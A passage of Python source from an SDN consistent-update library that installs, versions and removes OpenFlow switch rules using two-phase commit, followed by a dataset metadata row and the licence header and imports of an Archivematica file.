self.future_abstract_rules[switch] = Decimal(len(config))
def tally_install(self, switch):
self.installs[switch] += 1
self.current_rules[switch] += 1
def tally_overhead(self, switch, config):
"""
Calculates rule overhead, i.e. the maximum number of rules
actually installed at a time versus the minimal rules
required. So, if we had 2*N rules installed while
transitioning between configs of size N, the overhead would be
100%
"""
if switch in self.current_abstract_rules:
old_size = self.current_abstract_rules[switch]
else:
old_size = 0
if switch in self.future_abstract_rules:
new_size = self.future_abstract_rules[switch]
else:
new_size = 0
base_size = max(old_size, new_size)
extra_size = \
Decimal(self.current_rules[switch] - base_size + len(config))
overhead = extra_size/max(base_size, 1)
self.max_overhead[switch] = max(self.max_overhead[switch], overhead)
def tally_modify(self, switch):
self.modifies[switch] += 1
def tally_delete(self, switch):
self.deletes[switch] += 1
self.current_rules[switch] -= 1
def all_installs(self):
return sum(self.installs.values())
def all_modifies(self):
return sum(self.modifies.values())
def all_deletes(self):
return sum(self.deletes.values())
def all_operations(self):
return self.all_installs() + self.all_modifies()
def all_overheads(self):
return max(self.max_overhead.values())
def __str__(self):
s = " Update Statistics\n"
s += "--------------------------------------------\n"
s += "Switch\t(+)\t(-)\t(~)\tTotal\tOverhead\n"
s += "--------------------------------------------\n"
for switch in set(self.installs.keys()
+ self.deletes.keys()
+ self.modifies.keys()):
i = self.installs[switch]
d = self.deletes[switch]
m = self.modifies[switch]
o = self.max_overhead[switch]
s += "s%d\t%d\t%d\t%d\t%d\t%d%%\n" % (switch, i, d, m, i+d+m, 100*o)
s += "--------------------------------------------\n"
s += "total\t%d\t%d\t%d\t%d\t%d%%\t%.4f\n" % \
(self.all_installs(),
self.all_deletes(),
self.all_modifies(),
self.all_operations(),
100*self.all_overheads(),
time() - self.start_time)
return s
##########################################
# OPENFLOW-LEVEL INSTALL/DELETE COMMANDS #
##########################################
def install_rule(switch, pattern, actions, priority, idle_timeout):
""" Wrapper for OpenFlow add request """
inst.stats.tally_install(switch)
if not experiment:
inst.send_flow_command(switch,
openflow.OFPFC_ADD,
pattern,
priority,
(idle_timeout, actions, UINT32_MAX),
openflow.OFP_FLOW_PERMANENT)
return
def modify_rule(switch, pattern, actions, priority,
idle_timeout=openflow.OFP_FLOW_PERMANENT):
"""
Wrapper for OpenFlow modify request
counters and timeouts are copied from current rule if they exist
"""
inst.stats.tally_modify(switch)
if not experiment:
inst.send_flow_command(switch,
openflow.OFPFC_MODIFY,
pattern,
priority,
(idle_timeout, actions, UINT32_MAX),
openflow.OFP_FLOW_PERMANENT)
return
def delete_rules(switch, pattern, priority):
""" Wrapper for OpenFlow delete request """
inst.stats.tally_delete(switch)
if not experiment:
inst.send_flow_command(switch, openflow.OFPFC_DELETE_STRICT, pattern,
priority)
return
########################################
# POLICY-LEVEL INSTALL/DELETE COMMANDS #
########################################
def install(policy, idle_timeout=openflow.OFP_FLOW_PERMANENT):
""" Propagates a policy into the network """
for switch, config in policy:
if not switch in inst.concrete_policy:
inst.concrete_policy[switch] = defaultdict(lambda:[])
inst.stats.tally_overhead(switch, config)
if DEBUG:
log.debug("Installing " + str(len(config)) + " rules on "
+ str(switch))
# log.debug("Installing: " + str(config))
for rule in config:
nox_pattern, nox_actions = rule.convert_to_nox_rule()
install_rule(switch, nox_pattern, nox_actions, rule.priority,
idle_timeout)
inst.installed_priority[switch][rule.pattern] = rule.priority
inst.concrete_policy[switch][rule.parent].append(rule)
return
def uninstall(policy):
""" Removes a policy from the network """
for switch, config in policy:
if not switch in inst.concrete_policy:
inst.concrete_policy[switch] = defaultdict(lambda:[])
if DEBUG:
log.debug("Uninstalling " + str(len(config)) + " rules on "
+ str(switch))
# log.debug("Uninstalling: " + str(config))
for rule in config:
priority = inst.installed_priority[switch][rule.pattern]
delete_rules(switch, rule.pattern.to_dict(), priority)
inst.concrete_policy[switch][rule.parent].remove(rule)
return
def modify_policy(policy, idle_timeout=openflow.OFP_FLOW_PERMANENT):
""" Propagates a policy into the network """
for switch, config in policy:
if not switch in inst.concrete_policy:
inst.concrete_policy[switch] = defaultdict(lambda:[])
if DEBUG:
log.debug("Modifying " + str(len(config)) + " rules on "
+ str(switch))
for rule in config:
nox_pattern, nox_actions = rule.convert_to_nox_rule()
old_priority = inst.installed_priority[switch][rule.pattern]
# modify_rule(switch, nox_pattern, nox_actions, rule.priority,
# idle_timeout)
if old_priority != rule.priority:
install_rule(switch, nox_pattern, nox_actions, rule.priority,
idle_timeout)
delete_rules(switch, nox_pattern, old_priority)
if rule in inst.concrete_policy[switch][rule.parent]:
inst.concrete_policy[switch][rule.parent].remove(rule)
inst.concrete_policy[switch][rule.parent].append(rule)
inst.installed_priority[switch][rule.pattern] = rule.priority
return
##########################
# POLICY INSTRUMENTATION #
##########################
# JNF TODO: implement IN_PORT and FLOOD actions
def mk_versioned_actions(actions, version, tagged, edge_ports, old_version,
fake_edge_ports):
"""
Instruments a list of actions, modifying the vlan tag as needed
for a versioned policy
actions: list of actions to instrument
version: policy version number
tagged: if the traffic is already versioned or not
edge_ports: set of outward-facing ports according to the topology
"""
new_actions = []
for action in actions:
if action.tag == "forward":
[port] = action.subexprs
if port in edge_ports:
if tagged:
if old_version is None:
new_actions.append(strip("vlan"))
elif port in fake_edge_ports:
new_actions.append(modify(("vlan", old_version)))
tagged = "external"
else:
if tagged == "external":
new_actions.append(modify(("vlan", version)))
tagged = "internal"
elif not tagged:
new_actions.append(modify(("vlan", version)))
tagged = "internal"
new_actions.append(action)
else:
new_actions.append(action)
return new_actions
def mk_internal_rule(rule, version, priority, edge_ports,
old_version, fake_edge_ports):
internal_pattern = Pattern(rule.pattern, DL_VLAN=version)
# internal_pattern.DL_VLAN = version
internal_actions = mk_versioned_actions(rule.actions, version,
tagged="internal",
edge_ports=edge_ports,
old_version=old_version,
fake_edge_ports=fake_edge_ports)
return Rule(internal_pattern, internal_actions, priority=priority,
parent=rule, edge=False)
def mk_edge_rule(rule, version, priority, edge_ports, old_version,
fake_edge_ports):
edge_pattern = Pattern(rule.pattern, DL_VLAN=openflow.OFP_VLAN_NONE)
edge_actions = mk_versioned_actions(rule.actions, version, False,
edge_ports, old_version,
fake_edge_ports)
return Rule(edge_pattern, edge_actions, priority=priority, parent=rule,
edge=True)
def mk_fake_edge_rule(rule, version, priority, edge_ports, old_version,
fake_edge_ports):
edge_pattern = Pattern(rule.pattern, DL_VLAN=old_version)
edge_actions = mk_versioned_actions(rule.actions, version, False,
edge_ports, old_version,
fake_edge_ports)
return Rule(edge_pattern, edge_actions, priority=priority,
parent=rule, edge=True)
def mk_versioned_configs(switch, config, version, priority,
topology, old_version=None,
fake_edge_ports=None, fake_edge_switches=None):
internal_config = SwitchConfiguration()
edge_config = SwitchConfiguration()
if not fake_edge_switches:
fake_edge_switches = []
edge_switches = topology.edge_switches() + list(fake_edge_switches)
edge_ports = topology.edge_ports(switch)
if not fake_edge_ports:
fake_edge_ports = []
for rule in config:
# if rule only applies to internal traffic
if (switch not in edge_switches
or (rule.pattern.IN_PORT != Pattern.WILD
and rule.pattern.IN_PORT not in edge_ports
and rule.pattern.IN_PORT not in fake_edge_ports)):
internal_rule = mk_internal_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
internal_config.add_rule(internal_rule)
# otherwise, if rule may apply to both internal and edge traffic
else:
# if rule only applies to edge traffic
if rule.pattern.IN_PORT in edge_ports:
edge_rule = mk_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
edge_config.add_rule(edge_rule)
elif rule.pattern.IN_PORT in fake_edge_ports:
edge_rule = mk_fake_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
edge_config.add_rule(edge_rule)
else:
edge_rule = mk_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
fake_edge_rule = mk_fake_edge_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
# add both internal and edge rules to respective configs
internal_rule = mk_internal_rule(rule, version, priority,
edge_ports, old_version,
fake_edge_ports)
internal_config.add_rule(internal_rule)
edge_config.add_rule(edge_rule)
edge_config.add_rule(fake_edge_rule)
return (internal_config, edge_config)
def mk_versioned_policies(policy, version, priority, topology,
old_version=None,
fake_edge_ports=None):
""" Constructs internal and edge policies from policy and version """
# initialize fresh policy objects
internal_policy = NetworkPolicy()
edge_policy = NetworkPolicy()
# for each switch mentioned in the policy
for switch, config in policy:
# FIXME: Am I supposed to pass through the fake_edge_ports
# arg? How does this work again?
internal_config, edge_config = \
mk_versioned_configs(switch, config, version, priority, topology,
old_version=old_version, fake_edge_ports=None)
internal_policy[switch] = internal_config
edge_policy[switch] = edge_config
return (internal_policy, edge_policy)
#####################
# UPDATE INTERFACES #
#####################
def per_packet_update(topology, new_policy, use_extension=True,
use_subspace=True, use_island=False):
"""
Updates to new policy using versioning + two-phase commit and
optimizations when safe topology: nxtopo.NXTopo object
representing topology new_policy: policy.NetworkPolicy object
count: boolean signaling to count initial empty install
use_extension: boolean denoting signaling to use extension
optimization use_partial: boolean denoting signaling to use
partial update optimization
"""
# if current policy empty
if (inst.current_internal_policy.is_empty()
and inst.current_edge_policy.is_empty
and inst.current_abstract_policy.is_empty()):
# use empty_update
update = empty_update(topology, new_policy)
else:
minus_delta = inst.current_abstract_policy - new_policy
plus_delta = new_policy - inst.current_abstract_policy
# If retraction
if use_extension and new_policy <= inst.current_abstract_policy and \
is_not_reachable(minus_delta, inst.current_abstract_policy - minus_delta,
topology):
update = retraction_update(topology, new_policy, minus_delta)
# else if extension
elif use_extension and inst.current_abstract_policy <= new_policy and \
is_not_reachable(plus_delta, inst.current_abstract_policy, topology):
update = extension_update(topology, new_policy, plus_delta)
# otherwise
elif use_subspace:
update = subspace_update(topology, new_policy)
# partial_per_packet_update(topology, new_policy,
# inst.current_abstract_policy)
elif use_island:
update = island_update(topology, new_policy)
else:
update = full_per_packet_update(topology, new_policy)
two_phase_update(topology, update)
inst.current_abstract_policy = new_policy
return
def per_flow_update(topology, new_policy, flow_window, refine, refine_window,
use_extension=True, use_subspace=True, use_island=False):
"""
Updates to new policy using versioning + two-phase commit
topology: nxtopo.NXTopo object representing topology
new_policy: policy.NetworkPolicy object
flow_window: time window between flows
refine: function from a pattern to a list of patterns
- must denotes the same fragment of flowspace!
refine_window: timer for invoking refine_flows
"""
# if current policy empty
if (inst.current_internal_policy.is_empty()
and inst.current_edge_policy.is_empty()):
# use empty_update
update = empty_update(topology, new_policy)
# otherwise
else:
return
def two_phase_update_flows(topology, update):
# if necessary, garbage collect priorities
if inst.current_priority == 0:
priority_garbage_collect()
# retrieve current data from stats
current_internal_policy = inst.current_internal_policy
current_edge_policy = inst.current_edge_policy
current_version = inst.current_version
current_priority = inst.current_priority
# calculate new versions
new_version = current_version + 1
# calculate new priorities:
# - flow_priority for active flows from old policy
# - new priority (lower) for new policy
flow_priority = current_priority - 1
new_priority = current_priority - 2
# create versioned policies for internal and edge traffic
internal_policy, edge_policy = \
mk_versioned_policies(new_policy, new_version, new_priority,
topology)
# calculate flows for current edge policy
active_flows = current_edge_policy.flows()
# (1) install internal policy
install(internal_policy)
# (2) reinstall current policy at flow_priority, using
# flow_window as idle_timeout
# TODO: Now that we use rule priorities, make sure each rule
# is at flow_priority
install(current_internal_policy, idle_timeout=flow_window)
install(current_edge_policy, idle_timeout=flow_window)
# (3) install edge policy
install(edge_policy)
# (4) remove old edge policy
# TODO: Removed old priority argument (=
# current_priority). Verify this is not needed
uninstall(current_edge_policy)
# (5) remove old internal policy
uninstall(current_internal_policy)
# update inst with old data
inst.active_flows = active_flows
inst.current_internal_policy = internal_policy
inst.current_edge_policy = edge_policy
inst.current_version = new_version
inst.current_priority = new_priority
inst.post_callback(refine_window,
lambda:refine_flows(flow_window, refine,
refine_window, flow_priority))
def priority_garbage_collect():
""" Resets priority to maximum value """
# retrieve current data from inst
current_internal_policy = inst.current_internal_policy
current_edge_policy = inst.current_edge_policy
active_flows = inst.active_flows
# reset priority
new_priority = MAX_PRIORITY
# if active_flows exist
if active_flows:
flow_priority = MAX_PRIORITY
new_priority = flow_priority - 1
# modify them to be at flow priority
for switch, flows in active_flows:
for (pattern, actions) in flows:
modify_rule(switch, pattern, actions, flow_priority)
# reinstall current policy at new priority
modify_policy(current_internal_policy, new_priority)
modify_policy(current_edge_policy, new_priority)
# # uninstall old policies
# uninstall(current_internal_policy)
# uninstall(current_edge_policy)
# update inst with new data
inst.current_internal_policy.set_priority(new_priority)
inst.current_edge_policy.set_priority(new_priority)
inst.current_priority = new_priority
return
########################
# UPDATE OPTIMIZATIONS #
########################
# TODO: Restore 'count' argument? Still needed?
def empty_update(topology, new_policy):
"""
precondition: current policy has no rules
provides per-packet and per-flow (vacuously)
"""
assert not (inst.current_internal_policy or
inst.current_edge_policy or
inst.current_abstract_policy)
log.debug("Empty update")
# update stats
inst.stats.tally_update(new_policy)
if DEBUG:
log.debug("New policy: \n" + str(new_policy))
# retrieve current version from inst
current_version = inst.current_version
# reset priority to maximum value and bump version number
new_priority = MAX_PRIORITY
new_version = current_version + 1
# create versioned policies for internal and edge traffic
internal_policy, edge_policy = \
mk_versioned_policies(new_policy, new_version, new_priority, topology)
return UpdateObject(internal_policy, edge_policy, None, None,
new_priority, new_version)
def extension_update(topology, new_policy, plus_delta):
"""
precondition: plus_delta is unreachable from current policy
provides per-packet
"""
plus_internal_delta, plus_edge_delta = \
mk_versioned_policies(plus_delta, inst.current_version,
inst.current_priority, topology)
# update stats
inst.stats.tally_update(new_policy)
log.debug("Extension update!")
current_version = inst.current_version
current_priority = inst.current_priority
return UpdateObject(plus_internal_delta, plus_edge_delta,
NetworkPolicy(), NetworkPolicy(),
current_priority, current_version)
def retraction_update(topology, new_policy, minus_delta):
"""
precondition: minus_delta is unreachable from current policy - minus_delta
provides per-packet
"""
minus_internal_delta, minus_edge_delta = concrete_rules(minus_delta)
# update stats
inst.stats.tally_update(new_policy)
log.debug("Retraction update!")
current_version = inst.current_version
current_priority = inst.current_priority
return UpdateObject(NetworkPolicy(), NetworkPolicy(),
minus_internal_delta, minus_edge_delta,
current_priority, current_version)
# FIXME: I suspect this is broken since we ignore the induced subgraph
# and induced subpolicy
def island_update(topology, new_policy):
"""
precondition: Assumes that only one island update is performed,
and no subspace updates have been performed. This assumption is
forced by our use of VLAN tags instead of MPLS labels
provides per-packet
"""
inst.stats.tally_update(new_policy)
log.info("Island update")
old_policy = inst.current_abstract_policy
# Switches which didn't change in new policy
nops = set( s1 for s1, c1 in old_policy \
if switch_covered(c1, new_policy[s1]))
# Everything else
new = set(topology.switches()) - nops
old = set()
fixpoint = island_fixpoint(topology, new_policy)
while new:
additions = fixpoint(new, old)
old |= new
new = additions
mods = old
subpolicy = restrict_policy(mods, new_policy)
boundary = nx.edge_boundary(topology, mods)
fake_edge_ports = \
[topology.node[x]['ports'][y] for (x,y) in boundary \
if topology.node[y]['isSwitch']]
# retrieve current data from inst
current_internal_policy = inst.current_internal_policy
current_edge_policy = inst.current_edge_policy
current_version = inst.current_version
current_priority = inst.current_priority
# calculate new version and priority
new_version = current_version + 1
new_priority = current_priority - 1
# Have to manually construct the correct edge policies by
# distinguishing between "true" edge ports to hosts and "fake"
# edge ports to other switches running the old version.
internal_policy, edge_policy = \
mk_versioned_policies(subpolicy, new_version, new_priority, topology,
old_version=current_version,
fake_edge_ports=fake_edge_ports)
old_internal_policy = restrict_policy(mods, current_internal_policy)
old_edge_policy = restrict_policy(mods, current_edge_policy)
return UpdateObject(internal_policy, edge_policy,
old_internal_policy,
old_edge_policy,
new_priority, new_version)
def subspace_update(topology, new_policy):
"""
precondition: none
provides per-packet
"""
log.info("Fixpoint subspace update")
inst.stats.tally_update(new_policy)
if DEBUG:
log.debug("Installing new policy: " + str(new_policy))
old_policy = inst.current_abstract_policy
# Correctness argument:
# * dels[s] = { r in c[s] | not covered(r) }
# * nops[s] = { r in c[s] | covered(r) } (* = c[s] \ dels[s] *)
# * mods[s] = { r' in c'[s] | not exist a rule r in nops[s].
# r ~ r' and actions(r) = actions(r') }
# Note that we can derive dels and nops from mods:
# nops'[s] = { r in c[s] | forall r' in c'[s] - mods'[s].
# if r' ~ r then actions(r) = actions(r')
# dels' = c \ nops'
# Lemma: if mods' = mods, then nops' = nops and dels' = dels
# Next, close mods under forwards and backwards reachability
# By construction, every rule in nops covers some rule in new
dels = NetworkPolicy()
for s1, c1 in old_policy:
dels[s1] = SwitchConfiguration([r for r in c1 \
if not covered(r, new_policy[s1])])
nops = NetworkPolicy()
for s1, c1 in old_policy:
nops[s1] = c1 - dels[s1]
mods = NetworkPolicy()
for s1, c1 in new_policy:
mods[s1] = SwitchConfiguration([r1 for r1 in c1 \
if not covered(r1, nops[s1])])
fixpoint = subspace_fixpoint(topology)
remainder = new_policy - mods
edge = mods
while True:
log.debug("Entering fixpoint")
remainder, edge = fixpoint(remainder, edge)
log.debug("Finished fixpoint")
if (not edge):
break
# Need to compute mapping from new rules to old rules that cover
mods = new_policy - remainder
new_version = inst.current_version + 1
new_priority = inst.current_priority - 1
plus_internal_delta, plus_edge_delta = \
mk_versioned_policies(mods, new_version, new_priority, topology)
minus_internal_delta, minus_edge_delta = concrete_rules(dels)
return UpdateObject(plus_internal_delta, plus_edge_delta,
minus_internal_delta, minus_edge_delta,
new_priority, new_version)
def full_per_packet_update(topology, new_policy, old_version=None):
"""
* precondition: none
* provides per-packet
"""
# update stats
log.debug("Full update!")
if DEBUG:
log.debug("New policy:" + str(new_policy))
inst.stats.tally_update(new_policy)
# calculate new version and priority
new_version = inst.current_version + 1
new_priority = inst.current_priority - 1
# create versioned policies for internal and edge traffic
internal_policy, edge_policy = \
mk_versioned_policies(new_policy, new_version, new_priority, topology,
old_version=old_version)
return UpdateObject(internal_policy, edge_policy,
inst.current_internal_policy,
inst.current_edge_policy,
new_priority, new_version)
#############################
# OPTIMIZATIONS SUBROUTINES #
#############################
def connects(r1, s1, r2, s2, topology):
"""
We say that a rule r1 on switch s1 "connects" to a rule r2 on a switch s2
under a configuration c if:
* r1's actions forward packets to output port p1
* the topology connects output port p1 on s1 to input port p2 on s2
* the in_port constraint in r2's pattern is either p2 or wildcard
* updating r1's pattern with modifications mentioned in r1's actions
yields a pattern whose intersection with r2's pattern is non-empty
"""
for pkt, out_port in r1.apply(r1.pattern):
new_switch, in_port = topology.node[s1]['port'][out_port]
if new_switch == s2:
if r2.pattern.intersects(pkt):
return True
return False
# Need to know how many ports this switch has to see if the in_port
# wildcard is covered
def covered(r, config):
"""
Given a rule r in c[s], we say that r is covered, written covered(r)
if the following condition holds:
there exists a subset rs' of c'[s].
(for every rule r' in rs'. actions(r) = actions(r')) and
pattern(rs') == pattern(r)
"""
# FIXME: We cheat for optimization here. I know that I never split rules, so a rule is covered exactly when there is a new rule with the exact same pattern and action
return config.contains_matching_rule(r)
# return set_covers(covers(r, config), r)
def set_covers(rs, r):
ps = []
for r1 in rs:
if not list_eq(r1.actions, r.actions):
return False
else:
ps.append(r1.pattern)
return set_covers_pattern(ps, r.pattern)
def set_covers_pattern(ps, p):
"""
Approximates set covering. If p has a wildcard, then one of the
patterns must have a wildcard
"""
for header, value in p:
match = False
if value == Pattern.WILD:
for p1 in ps:
if p1[header] == Pattern.WILD:
match = True
break
else:
for p1 in ps:
if p1[header] == value:
match = True
elif p1[header] != value:
match = False
break
if not match:
return False
return True
def covers(r, config):
"""
Given a rule r in c[s], we say r' is in covers(r) if: r' is in
c'[s] and actions(r) = actions(r') and pattern(r') ~ pattern(r)
"""
assert(isinstance(r, Rule))
covering = set()
for rule in config:
if rule.pattern <= r.pattern:
if not list_eq(rule.actions, r.actions):
return set()
covering.add(rule)
return covering
def list_of_covers(rs, config):
return set(rule for r in rs for rule in covers(r, config))
class flow_space(object):
def __init__(self, flows=None):
if isinstance(flows, list):
self.__pkts__ = defaultdict(set)
for sw, p, pkt, rule in flows:
if pkt.in_port != p:
new_pkt = Pattern(pkt, in_port=p)
else:
new_pkt = pkt
self.__pkts__[sw].add((new_pkt, rule))
elif isinstance(flows, dict):
self.__pkts__ = flows.copy()
else:
self.__pkts__ = defaultdict(set)
def add(self, sw, pkt, rule):
self.__pkts__[sw].add((pkt, rule))
def __getitem__(self, switch):
return self.__pkts__[switch]
def __setitem__(self, switch, value):
self.__pkts__[switch] = value
def __iter__(self):
return self.__pkts__.iterkeys()
def __and__(self, other):
""" Right biased intersection: takes rules from other """
intersection = flow_space()
for switch in self:
for pkt, _ in self[switch]:
for pkt2, rule2 in other[switch]:
if pkt.intersects(pkt2):
if pkt <= pkt2:
intersection.add(switch, pkt, rule2)
else:
intersection.add(switch, pkt2, rule2)
return intersection
def __or__(self, other):
union = flow_space()
for switch in self:
union[switch] = self[switch] | other[switch]
return union
def apply_topology(self, topology):
"""
Transfers each located packets lp = (port, pkt) in outgoing to
port' such that (port, port') is in graph
"""
for switch in self:
outgoing = self[switch]
output = flow_space([])
for pkt, rule in outgoing:
port = pkt.IN_PORT
(target_switch, target_port) = topology.node[switch]['port'][port]
if not (target_switch in topology.node
and topology.node[target_switch]['isSwitch']):
continue
pkt = Pattern(pkt, IN_PORT=target_port)
output.add(target_switch, pkt, rule)
return output
def rules(self):
"""
Returns a policy representing the rules contributing to the flow space
"""
policy = NetworkPolicy()
for switch in self:
config = SwitchConfiguration()
for _, rule in self[switch]:
config.add_rule(rule)
policy[switch] = config
return policy
def rng(policy, topology):
_range = flow_space()
for switch in policy:
for rule in policy[switch]:
for port, pkt in rule.apply(rule.pattern):
(target_switch, target_port) = topology.node[switch]['port'][port]
pkt = Pattern(pkt, IN_PORT=target_port)
_range.add(target_switch, pkt, rule)
return _range
def dom(policy):
_dom = flow_space()
for switch in policy:
for rule in policy[switch]:
_dom.add(switch, rule.pattern, rule)
return _dom
def subspace_fixpoint(topology):
def fixpoint(rest, edge):
edge_domain = dom(edge)
edge_range = rng(edge, topology)
rest_domain = dom(rest)
rest_range = rng(rest, topology)
new_edge = ((edge_domain & rest_range) | (edge_range & rest_domain)).rules()
return (rest - new_edge, new_edge)
return fixpoint
def switch_covered(old_config, new_config):
"""
Given a switch s, we say that s is covered, written covered(s)
if the following condition holds:
for every r' in c'[s], r' is in covers(r) for some r in c[s]
for every r in c[s], covered(r)
"""
covering = []
for r1 in old_config:
if not covered(r1, new_config):
return False
cover = covers(r1, new_config)
covering += cover
for r2 in new_config:
if not r2 in covering:
return False
return True
# TODO: Figure out how to make edge_ports and edge_switches work
# Idea: The set-at-a-time algorithm for subset update was super fast, but it's not clear how to do the same for island,
def island_fixpoint(topology, new_policy):
def fixpoint(new, old):
mods_set = new | old
addition = set()
for a in (new | old):
mods_set.remove(a)
for b in (new | old):
if (a in old and b in old):
continue
if a != b:
mods_set.remove(b)
for rule in new_policy[a]:
p = rule.pattern
path = find_path(topology, new_policy, mods_set, p, a, b)
if path:
mods_set |= path
addition |= path
mods_set.add(b)
mods_set.add(a)
return addition
return fixpoint
def restrict_policy(switches, policy):
new_policy = NetworkPolicy()
for s in switches:
new_policy[s] = policy[s]
return new_policy
def rules_intersect(r1, r2):
return r1.pattern.intersects(r2.pattern)
def sorted_list_diff(l1, l2):
""" Computes l1 - l2. Assumes l1 and l2 are sorted """
# TODO: This would be much simpler as a loop or fold
diff = []
l1_iter = iter(l1)
l2_iter = iter(l2)
l1_done = False
l2_done = False
# Get the first item from each list
try:
item1 = l1_iter.next()
except StopIteration:
l1_done = True
try:
item2 = l2_iter.next()
except StopIteration:
l2_done = True
while not (l1_done or l2_done):
if item1 < item2:
diff.append(item1)
try:
item1 = l1_iter.next()
except StopIteration:
l1_done = True
break
elif item1 == item2:
try:
item1 = l1_iter.next()
except StopIteration:
l1_done = True
break
else:
try:
item2 = l2_iter.next()
except StopIteration:
l2_done = True
break
# post condition: l1_done \/ l2_done
if l1_done:
return diff
else:
while not l1_done:
try:
diff.append(l1_iter.next())
except StopIteration:
l1_done = True
return diff
def two_phase_update(topology, update):
# if necessary, garbage collect priorities
if inst.current_priority == 0:
priority_garbage_collect()
plus_edge_policy = update.plus_edge_policy
minus_edge_policy = update.minus_edge_policy
plus_internal_policy = update.plus_internal_policy
minus_internal_policy = update.minus_internal_policy
new_priority = update.new_priority
new_version = update.new_version
modify_edge_policy = \
plus_edge_policy.pattern_intersect(inst.current_edge_policy)
install_edge_policy = \
plus_edge_policy.pattern_diff(inst.current_edge_policy)
uninstall_edge_policy = minus_edge_policy.pattern_diff(modify_edge_policy)
# (1) install internal policy
if DEBUG:
log.debug("Installing new internal policy: \n" + str(plus_internal_policy))
install(plus_internal_policy)
# TODO: Wait for rules to be installed
# (2) install edge policy
if DEBUG:
log.debug("Installing new edge policy: \n" + str(install_edge_policy))
install(install_edge_policy)
if DEBUG:
log.debug("Modifying old edge policy: \n" + str(modify_edge_policy))
modify_policy(modify_edge_policy)
# (3) remove old edge policy
if DEBUG:
log.debug("Uninstalling old edge policy: \n" + str(uninstall_edge_policy))
uninstall(uninstall_edge_policy)
# TODO: Wait for packets to leave
# (4) remove old internal policy
if DEBUG:
log.debug("Uninstalling old internal policy: \n" \
+ str(minus_internal_policy))
uninstall(minus_internal_policy)
# update inst with new data
inst.current_internal_policy = \
(inst.current_internal_policy + plus_internal_policy).pattern_diff(minus_internal_policy)
inst.current_edge_policy = \
(inst.current_edge_policy + install_edge_policy + modify_edge_policy).pattern_diff(uninstall_edge_policy)
inst.current_version = new_version
inst.current_priority = new_priority
inst.currrent_topo = topology
return
def end_flow(switch, flow):
"""
* called by NOX when a flow is removed from a switch
* deletes flow if it is in inst.active_flows
* note that not all flows are tracked in inst.active_flows
"""
active_flows = inst.active_flows
if (active_flows.has_key(switch) and flow in active_flows[switch]):
active_flows[switch].remove(flow)
if active_flows[switch] == []:
del active_flows[switch]
return
def refine_flows(flow_window, refine, refine_window, priority):
"""
* refines active flows into smaller flows
* invoked on a timer from per_flow_update
* flow_window: time window between flows
* refine: function from a pattern to a list of patterns
- must denotes the same fragment of flowspace!
* refine_window: timer for invoking refine_flows
* priority: priority flows currently installed at
"""
new_active_flows = {}
for switch, flows in inst.active_flows:
new_flows = []
for (pattern, actions) in flows:
for new_pattern in refine(pattern):
new_flows.append(new_pattern, actions)
install_rule(switch, new_pattern, actions, priority,
flow_window)
delete_rules(switch, pattern.to_dict(), priority)
if new_flows:
new_active_flows[switch] = new_flows
inst.active_flows = new_active_flows
if new_active_flows:
inst.post_callback(refine_window,
lambda:refine_flows(flow_window, refine,
refine_window, priority))
return
def config_domain(config):
"""
The domain of a configuration is the flow-space that matches a rule
in the configuration. For efficiency, should change this to be
sorted
"""
return set( rule.pattern for rule in config )
# return reduce_flow_space(domain)
def config_range(config):
return [ pat for rule in config for pat in rule.apply(rule.pattern) ]
def concrete_rules(policy):
concrete_edge_policy = NetworkPolicy()
concrete_internal_policy = NetworkPolicy()
for switch, config in policy:
concrete_edge_policy[switch] = SwitchConfiguration()
concrete_internal_policy[switch] = SwitchConfiguration()
for rule in config:
for conc_rule in inst.concrete_policy[switch][rule]:
if conc_rule.edge:
concrete_edge_policy[switch].add_rule(conc_rule)
else:
concrete_internal_policy[switch].add_rule(conc_rule)
return concrete_internal_policy, concrete_edge_policy
def is_not_reachable(delta, old, graph):
"""
Checks that no traffic from the old configuration can reach new rules
"""
old_domain = defaultdict(set)
old_range = defaultdict(set)
new_domain = defaultdict(set)
new_range = defaultdict(set)
# Check non-intersecting domains
for switch, config in old:
if not switch in delta:
# new_domain[switch] = []
# new_range[switch] = []
continue
else:
old_domain[switch] = config_domain(config)
old_range[switch] = config_range(config)
new_domain[switch] = config_domain(delta[switch])
new_range[switch] = config_range(delta[switch])
# Check non-reachability
for switch, rng in old_range.iteritems():
one_hop = apply_topology(switch, rng, graph)
for new_switch in one_hop:
if flows_intersecting(new_domain[new_switch], one_hop[new_switch]):
return False
return True
def find_path(graph, policy, forbidden, patt, src, dst):
assert isinstance(patt, Pattern)
# Does a DFS search
stack = [(set(), src, patt)]
while stack:
path, sw, pkt = stack.pop()
conf = policy[sw]
rule = conf[pkt]
outgoing = rule.apply(pkt)
try:
incoming = apply_topology(sw, outgoing, graph)
except KeyError:
continue
for sw, pkts in incoming.iteritems():
if sw == dst:
return path
if sw in forbidden:
continue
for pkt in pkts:
new_path = path.copy()
new_path.add(sw)
stack.append((new_path, sw, pkt))
return None
def apply_topology(switch, outgoing, graph):
"""
Transfers each located packets lp = (port, pkt) in outgoing to
port' such that (port, port') is in graph
"""
output = defaultdict(set)
for pkt, port in outgoing:
(target_switch, target_port) = graph.node[switch]['port'][port]
if not (target_switch in graph.node
and graph.node[target_switch]['isSwitch']):
continue
pkt = Pattern(pkt, IN_PORT=target_port)
output[target_switch].add(pkt)
return output
def flows_intersecting(flows1, flows2):
"""
Tests whether any of the patterns in flow1 and flow2 have packets
in common
"""
# TODO: Make args ordered
# TODO: Right now this assumes that patterns have the same "granularity" as in our examples. Need to uncomment to return to general case.
# for flow1 in flows1:
# for flow2 in flows2:
# if flow1 <= flow2 or flow2 <= flow1:
# return True
# return False
return bool(flows1 & flows2)
| XianliangJ/collections | CNUpdates/updates/update_lib.py | Python | gpl-3.0 | 49,836 | 0.00602 |
# This file is part of Archivematica.
#
# Copyright 2010-2013 Artefactual Systems Inc. <http://artefactual.com>
#
# Archivematica is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Archivematica is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Archivematica. If not, see <http://www.gnu.org/licenses/>.
from django.http import HttpResponse
from contrib.mcp.client import MCPClient
from lxml import etree
